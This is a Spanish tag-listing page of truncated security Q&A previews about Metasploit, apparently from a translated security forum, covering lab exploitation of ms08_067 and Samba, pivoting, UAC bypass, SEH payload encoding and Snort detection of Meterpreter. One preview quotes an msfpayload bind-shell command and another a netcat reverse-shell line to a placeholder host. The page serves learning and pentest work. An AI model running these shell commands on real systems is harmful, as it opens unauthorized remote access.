Preguntas con etiqueta 'metasploit'

5
respuestas

Explotación a través de un puerto filtrado

Estoy haciendo algunos intentos contra una máquina que el profesor puso en el laboratorio. NMAP muestra que el puerto 445 se filtra y Nessus confirma que la vulnerabilidad ms08_067 está presente en esa máquina. Intenté ejecutar Metasploit con...
hecha 10.03.2014 - 21:05
2
respuestas

Herramientas / métodos que ayudan a determinar la aplicación / protocolo que sirve el puerto específico

Realizo pruebas de Blackbox del servidor y descubrí que hay un montón de puertos de escucha. Necesito determinar para qué servicios / protocolos se usan esos puertos. Lo que he intentado hasta ahora es usar Armitage (por lo que tengo entendid...
hecha 28.08.2012 - 15:46
2
respuestas

código fuente de las cargas útiles de metasploit (shellcodes)

¿Hay alguna manera de ver un código fuente de códigos de shell metasploit? Por ejemplo: root@kali:~# msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 C /* * windows/shell_bind_tcp - 341 bytes * http://www.metasploit.com * VERBOS...
hecha 28.09.2014 - 15:02
1
respuesta

¿Cómo puedo hacer un mal uso de la información de la enumeración del servicio DCE?

Nessus informa casi en cualquier máquina de Windows "enumaración de servicio DCE". Con el módulo metasploit tcp_dcerpc_auditor obtengo la siguiente información: 192.168.1.23 - UUID 99fcfec4-5260-101b-bbcb-00aa0021347a 0.0 OPEN VIA 135 A...
hecha 09.07.2013 - 14:50
1
respuesta

¿Cómo convertiría un shell telnet abierto en una sesión Metasploit?

Estoy tratando de pivotar usando un sistema metasploitable2, que tiene un puerto de shell abierto en una exploración: port status service 1524/tcp open shell El acceso al shell raíz es bastante fácil en telnet, o incl...
hecha 28.08.2018 - 15:45
2
respuestas

reglas de Snort para detectar sesiones de Meterpreter

Estoy aprendiendo mientras configuro Snort, mi configuración consiste en un atacante (Linux), una víctima (teléfono inteligente Android) y un sistema de detección (IDS). Hasta ahora, he podido registrar todos los paquetes entre el atacante y la...
hecha 14.07.2016 - 07:03
2
respuestas

Conexión inversa Metasploitable 2 - Kali Linux (Samba 3.x) sin Metasploit

Estoy tratando de explotar Metasploitable 2 sin el uso de Metasploit, con el objetivo de aprender. En este caso, me estoy enfocando en Samba 3.x (Puerto TCP 139, 445) En este enlace enlace se explican dos métodos diferentes para explotar es...
hecha 08.01.2018 - 18:22
2
respuestas

¿Cómo ejecutar exploit / windows / local / bypassuac usando AutoRunScript?

¿Hay alguna manera de ejecutar exploits que requieran parámetros, como el que está en el título, usando AutoRunScript? Pude usar AutoRunScript para ejecutar algunos comandos de publicación perfectamente, como keylog_recorder o check...
hecha 03.11.2015 - 02:18
2
respuestas

Pentest: manejo de múltiples shells inversos

Estoy ejecutando un Pentest y estoy esperando shells inversos de múltiples shells que se conectan de nuevo como: - nc <my-ip> <my-port> -e /bin/bash Sin embargo, estoy tratando de descubrir la mejor manera de administrar estas c...
hecha 07.12.2013 - 14:52
2
respuestas

Codificación de una dirección que contiene un byte nulo en una carga útil

Estoy trabajando en un exploit SEH. El problema al que me enfrento aquí es que todas las direcciones POP / POP / RETN terminan con bytes nulos, por lo que todo lo que se coloca después de que se corrompe. ¿Es posible usar Metasploit Msfencode...
hecha 03.08.2013 - 16:56